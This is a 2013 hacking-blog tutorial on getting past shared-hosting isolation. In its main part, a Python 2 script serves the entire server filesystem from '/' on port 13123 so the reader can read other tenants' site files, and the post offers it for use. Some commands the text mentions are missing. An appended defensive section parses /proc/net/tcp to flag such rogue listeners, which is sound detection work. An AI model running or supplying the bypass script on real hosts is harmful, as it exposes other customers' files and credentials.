
Server Bypass via Symlink - Jumping in server 2013

Server Bypass via Symlink - Jumping in server | Juno_okyo's Blog
As we all know, symlinking is one of the greatest methods for bypassing server security, meaning reading the files of other sites on the same shared host.

To succeed with this tutorial, the following things are required:
  • Python installed on the server
  • Some scripts you will see below.

This idea started with the devilzc0de geeks; let me explain how it works.


Here we are in the folder /var/www/dono, trying to go into /www/.

No permission to go into /www.
Before tiring yourself out trying commands, you must check whether Python is installed, with the command:


Now take this Python script and name it webs.py. It's a small Python script that opens a new port on the server using the SimpleHTTPServer (Python) module. The script's default port is 13123.

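Code:
    #!/usr/bin/env python
    # Python 2 script: SimpleHTTPServer and SocketServer are the Python 2 module names.
    import SimpleHTTPServer
    import SocketServer
    import os

    port = 13123  # default listening port

    if __name__ == '__main__':
        # Serve files relative to the filesystem root
        os.chdir('/')
        Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

        # Empty host string binds to all interfaces
        httpd = SocketServer.TCPServer(("", port), Handler)

        print("Now open this server on webbrowser at port : " + str(port))
        print("example: http://maho.com:" + str(port))
        httpd.serve_forever()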

Next you will need to run the webs.py script with the following command:

Open the site on port 13123:
site.com:13123

And enjoy the symlinking :)
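
From the hosting side, the listener that webs.py opens appears in /proc/net/tcp as a LISTEN socket owned by the web account on port 13123 (hex 3343). The check below is an added example, not part of the original post; the sample table is constructed, and UID 33 (www-data on Debian) and the allowed-port set are assumptions.

```python
import socket
import struct

# Constructed sample in /proc/net/tcp format (not captured from a real host).
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 11001 1
   1: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000   106        0 11002 1
   2: 00000000:3343 00000000:0000 0A 00000000:00000000 00:00000000 00000000    33        0 11003 1
   3: 0A00000A:0050 0B00000A:C001 01 00000000:00000000 00:00000000 00000000    33        0 11004 1
"""

LISTEN = "0A"  # kernel TCP state code for LISTEN


def parse_listeners(text):
    """Return (ip, port, uid, inode) for each LISTEN socket in the table."""
    found = []
    for line in text.splitlines()[1:]:  # skip the header row
        f = line.split()
        if len(f) < 10 or f[3] != LISTEN:
            continue
        addr_hex, port_hex = f[1].split(":")
        # The address is a host-order 32-bit value; "<I" assumes a little-endian host.
        ip = socket.inet_ntoa(struct.pack("<I", int(addr_hex, 16)))
        found.append((ip, int(port_hex, 16), int(f[7]), int(f[9])))
    return found


def suspicious_listeners(text, web_uids, allowed_ports):
    """Listeners owned by a web/hosting account on a port outside the allowlist."""
    return [s for s in parse_listeners(text)
            if s[2] in web_uids and s[1] not in allowed_ports]


if __name__ == "__main__":
    # Assumptions: UID 33 is the web account (www-data on Debian); 80/443 are expected.
    # On a live host, pass open("/proc/net/tcp").read() instead of SAMPLE.
    for ip, port, uid, inode in suspicious_listeners(SAMPLE, {33}, {80, 443}):
        print("uid %d listening on %s:%d (socket inode %d)" % (uid, ip, port, inode))
```

This covers IPv4 sockets only; /proc/net/tcp6 uses a wider address field and needs its own decoding.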
Follow: http://hackthedevil.blogspot.com/2013/06/server-bypass-via-symlink-jumping-in.html
Leader at J2TEAM. Website: https://j2team.dev/
